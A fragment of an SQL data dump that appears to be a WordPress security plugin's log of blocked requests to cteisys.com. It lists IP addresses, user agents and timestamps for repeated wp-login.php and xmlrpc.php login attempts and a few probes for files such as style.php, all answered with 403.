Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','oUVhRYXN9wrn8ZaLkJ7xmFgz',0,1665594442.8582,313,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l0UFRE6CVemNMADiSQtLgj5n',0,1665594422.1942,10909,'','GET',403,0,700,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','6rF9KgdJA1Iny4ChfjR3Wi2z',0,1665599895.8133,17962,'','POST',403,0,600,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','nTjBrKOQE4dcwb6osMeDJvI3',0,1665601138.6853,17347,'','POST',403,0,600,0,1,'',0),('217.21.87.243',3642054643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','HXEvbncrBxpsRWA7ZOGzlKFt',0,1665598646.9442,17302,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Vo9OWhRmnQA13biza6B0upcS',0,1665598075.0368,1344,'','POST',403,0,600,0,1,'',0),('213.152.162.5',3583549957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','D91NRr5seLdpqgUWPXzvmYtS',0,1665597737.0544,1409,'','POST',403,0,515,0,1,'',0),('146.59.243.31',2453402399,'','https://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zjcCX4Zi7TPVtmba2x3SAGRK',0,1665604397.4423,316,'','GET',403,0,700,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qVJlEnCMYhpbGmr5BTN4QzDe',0,1665604365.4833,11690,'','GET',403,0,700,0,1,'',0),('184.75.221.171',3091979691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xti2OXbYPvJDLuw3r0UMn9RI',0,1665602623.2693,17355,'','POST',403,0,515,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','3TbZyfpkea7RIjVCdBcEium6',0,1665603623.8232,1421,'','POST',403,0,600,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Nh4ksIV9nzgjfpaKbMED8QBl',0,1665602378.2726,1441,'','POST',403,0,600,0,1,'',0),('104.254.90.251',1761499899,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LAUJKzNhF0I5BEdj28RCGVWo',0,1665606700.6426,19115,'','POST',403,0,515,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','lbgA3MxFXTsEB7NuKmoGiCRH',0,1665606148.7219,1519,'','POST',403,0,600,0,1,'',0),('213.152.161.20',3583549716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','F5RQyYejTOh9nSdbADL8GU0k',0,1665606068.0760,2554,'','POST',403,0,515,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','aUYjtorRFLNQJSy9bl8Bgh6d',0,1665604873.8490,6784,'','POST',403,0,600,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','UrSCg8FlWDB451HoQ2ifMRkt',0,1665611267.9144,1671,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','Hp2uh8wXG6qO1WinmVKvjILc',0,1665608707.4878,17852,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','Gs5EoM3hRdFaqIUH4ZKBLPyQ',0,1665609983.6773,17991,'','POST',403,0,600,0,1,'',0),('34.94.76.74',576605258,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','dhg3TvNtSYyZ6PxMErCnjcF5',0,1665615002.3509,781,'','POST',403,0,515,0,1,'',0),('27.72.145.33',457740577,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','rtzhsj0oZX87QME6RTBkJ5PO',0,1665615141.0315,17069,'','POST',403,0,600,0,1,'',0),('34.94.76.74',576605258,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','WoY4eXD9J07cm31qZEMtu6Vx',0,1665615001.5176,545,'','POST',403,0,515,0,1,'',0),('107.167.244.83',1806169171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6oO2FXSUZp9bNqldJVgf7hzT',0,1665614536.6182,1847,'','POST',403,0,515,0,1,'',0),('134.19.179.203',2249438155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dTjM7AZyvBHP4OU1g5Wo2iCE',0,1665613837.1898,2630,'','POST',403,0,515,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','9GQf8n0yjLY25UORJlrahumo',0,1665613847.9971,1283,'','POST',403,0,600,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','QIoYxcP4pR83ZO2tegzVAhTf',0,1665612555.3441,17715,'','POST',403,0,600,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','2ZNfW9gKTuJRYdL30aEFqk5D',0,1665616428.2540,17295,'','POST',403,0,600,0,1,'',0),('120.27.133.69',2015069509,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','sAxY60fIR2kqvdjXUeahW4wE',0,1665618998.1896,1574,'','POST',403,0,600,0,1,'',0),('51.178.76.51',867322931,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','vUXLlFzRyscewOmWkbVuxDt8',0,1665622919.0093,988,'','POST',403,0,600,0,1,'',0),('134.19.179.235',2249438187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BOv8MIRAZYTr2nieUduE6opL',0,1665621803.4729,2263,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','N0ZiU1cmFC2qMJKjnOskR4Dl',0,1665621570.9048,5301,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','NshySLYiagdmXzInrHqkwf9l',0,1665620141.6728,477,'','POST',403,0,600,0,1,'',0),('199.249.230.47',3355043375,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ql6XVc8dvpbyUoEGjJeLkmHn',0,1665620446.7882,2317,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','jkdzgmU4tFMKseqCARahrS26',0,1665620112.0166,1292,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','4fsILlY0yihMwnSkJoNAKZz7',0,1665619638.3548,1188,'','POST',403,0,600,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','sa256BhWiFvy94Gkdzru3c0w',0,1665625644.8231,17235,'','POST',403,0,600,0,1,'',0),('134.19.179.243',2249438195,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YyPVtKH7EGjUDJZS92qmdFWw',0,1665625219.8261,9683,'','POST',403,0,515,0,1,'',0),('185.156.174.155',3114053275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9Y3pEAr1ID8G5V0JfebQ4xCM',0,1665624980.1163,18339,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','AtRNzgX6LdHx4j9DPbnJ3wmV',0,1665624281.6234,486,'','POST',403,0,600,0,1,'',0),('185.189.112.27',3116199963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8ZuUGb0iHnfSlxP2rgkmjzVN',0,1665622918.9881,2855,'','POST',403,0,515,0,1,'',0),('103.98.152.12',1734514700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','51A48hSWaVcFDsorLyGkZnjU',0,1665627061.1537,2497,'','POST',403,0,515,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','7PnS3xfgadml5LMqtsQbprVW',0,1665627011.2297,17341,'','POST',403,0,600,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KPadv9AnjJcl0f2e6YHWSQow',0,1665626817.0725,18497,'','POST',403,0,515,0,1,'',0),('162.241.225.117',2733760885,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5v1RfV03Ms4Xdlxz8YBgrZPI',0,1665632540.4949,2228,'','POST',403,0,515,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','rsQP7fiIE1TDhOj5mw2VoKBv',0,1665632482.5206,4547,'','POST',403,0,600,0,1,'',0),('213.152.161.240',3583549936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1alkQBM50vNftgKycEzhIYZd',0,1665631936.5235,516,'','POST',403,0,515,0,1,'',0),('185.165.42.75',3114609227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ESbfL5pziVrmWknFYc8G43jR',0,1665631877.7441,1714,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v5UW7jt04yI2fz8c6hRmEAVT',0,1665631511.3150,2840,'','POST',403,0,515,0,1,'',0),('198.46.85.155',3324925339,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','D6SdAvFZ5hMYBtKR9IuzEg4m',0,1665631116.3884,7100,'','POST',403,0,600,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nJCFHu9NvjoWtaPhUd2r3pOk',0,1665630595.9728,18702,'','POST',403,0,515,0,1,'',0),('178.62.110.145',2990435985,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','38EhHOn7uqvVfxTpzQPLG0mZ',0,1665636912.2350,3141,'','POST',403,0,515,0,1,'',0),('198.12.254.32',3322740256,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pb2gs0qj8AfkN3r7G9DeTtLS',0,1665636811.0553,21131,'','POST',403,0,515,0,1,'',0),('194.163.35.152',3265471384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','FOgCGv2NKwWJkAMT8t6XmSoH',0,1665636557.1253,17748,'','POST',403,0,600,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3abOUrsR2BS9yAYJmTDoWGXn',0,1665636378.5943,18169,'','POST',403,0,515,0,1,'',0),('162.241.252.230',2733767910,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hUtXTFl4pGcb6ifAwNu3sSJR',0,1665635987.4639,20183,'','POST',403,0,515,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rCXmF5diETzBkZgLhKOIjels',0,1665636065.5292,1480,'','POST',403,0,515,0,1,'',0),('47.74.17.225',793383393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TF1xqSVbA5RIpGUhZwcy7Pek',0,1665635604.5817,14355,'','POST',403,0,515,0,1,'',0),('128.199.108.205',2160553165,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SzQ2NdVeOw9ft6pRYGLEMHWn',0,1665635499.8646,18849,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wTzdCVu2QZMyK5EFl71HGhPX',0,1665635171.6653,18469,'','POST',403,0,515,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','9U8qGui4MgPzkYl7pJnscvFZ',0,1665635205.9532,1245,'','POST',403,0,600,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HQhtLCT8OMnlsYcURJ5ab1uq',0,1665634597.0633,17414,'','POST',403,0,515,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','ipAm6sEv7DMr9zULxJTwjOlY',0,1665634432.9033,2165,'','POST',403,0,600,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EkQh8JRY4scjTz3xuV0GrNnI',0,1665634063.9024,20104,'','POST',403,0,515,0,1,'',0),('81.88.52.134',1364735110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y89AHjxX0uUfqJTmdC5aknbo',0,1665634204.7746,19059,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wyCJlVSOkMzfa0IBcK5vxDX1',0,1665638404.6188,2887,'','POST',403,0,515,0,1,'',0),('107.180.241.146',1807020434,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yt5XRK4rY6klSde8Ha23fjQq',0,1665638116.4211,1991,'','POST',403,0,515,0,1,'',0),('78.46.75.254',1311656958,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R6prPTvjsLWF9Gkm5iewfCBH',0,1665638028.0846,1595,'','POST',403,0,515,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','ywx49Cbr5dNP27KBDSc0ML6i',0,1665637941.6550,568,'','POST',403,0,600,0,1,'',0),('184.75.223.235',3091980267,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EcAa7frUMzFq96kRXSeYGH0u',0,1665637918.5663,2597,'','POST',403,0,515,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','CQS4KemfbVJ9PNo5xjAYTqIM',0,1665637903.4292,517,'','POST',403,0,600,0,1,'',0),('5.101.156.133',90545285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jgGuqd9bspRNlFUnJW0Kzri8',0,1665637636.7958,18225,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G4oXaZe2qh51nLbrcdRypmN3',0,1665637304.1825,1363,'','POST',403,0,515,0,1,'',0),('78.46.75.254',1311656958,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yRf6otM0K5D3ATYu7LbkWXPH',0,1665637223.7465,19236,'','POST',403,0,515,0,1,'',0),('213.152.161.165',3583549861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','scKF0p1V36ubewfHAOLQWNtx',0,1665645802.4324,1273,'','POST',403,0,515,0,1,'',0),('8.29.128.217',136151257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EzeX3nFYGdf19xiLtvmRNIoT',0,1665644306.9583,19566,'','POST',403,0,515,0,1,'',0),('103.153.68.244',1738097908,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wspWaFojUXS9HeuhdbAExPG7',0,1665643869.2173,1675,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IsQiOVYbBTCtm7g2fJ51NRjD',0,1665643530.0483,1724,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sKWgFCe36M8k5n4JAi1hTNzb',0,1665643426.7721,3266,'','POST',403,0,515,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','pRcv2N71uLUDiIEWHtXdCn0o',0,1665643258.8643,17374,'','POST',403,0,600,0,1,'',0),('5.101.156.133',90545285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Aqy2fo7jwLan8Xs0RrTFpVkU',0,1665642707.4256,18974,'','POST',403,0,515,0,1,'',0),('31.184.242.14',532214286,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HBnvGt4KEe0oi3PhaOM5urXf',0,1665642612.5952,2911,'','POST',403,0,515,0,1,'',0),('47.96.74.105',794839657,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','4LAByY1p3mKd5U6RTzMFVqJb',0,1665641919.6574,2710,'','POST',403,0,600,0,1,'',0),('207.154.204.99',3483028579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lNqmToh2CuJ6WkX0b79SRrds',0,1665641786.3278,2482,'','POST',403,0,515,0,1,'',0),('5.101.156.133',90545285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FVls1YcbZvQagoS24NWm3KXw',0,1665641509.8965,2365,'','POST',403,0,515,0,1,'',0),('43.231.112.85',736587861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UF7GquKys318MZHaICrDk4Oj',0,1665641397.5701,2342,'','POST',403,0,515,0,1,'',0),('152.32.211.172',2552288172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bvc2Yh83o0fwmL7ZDTaGNxp9',0,1665641099.5041,1385,'','POST',403,0,515,0,1,'',0),('85.119.122.23',1433893399,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 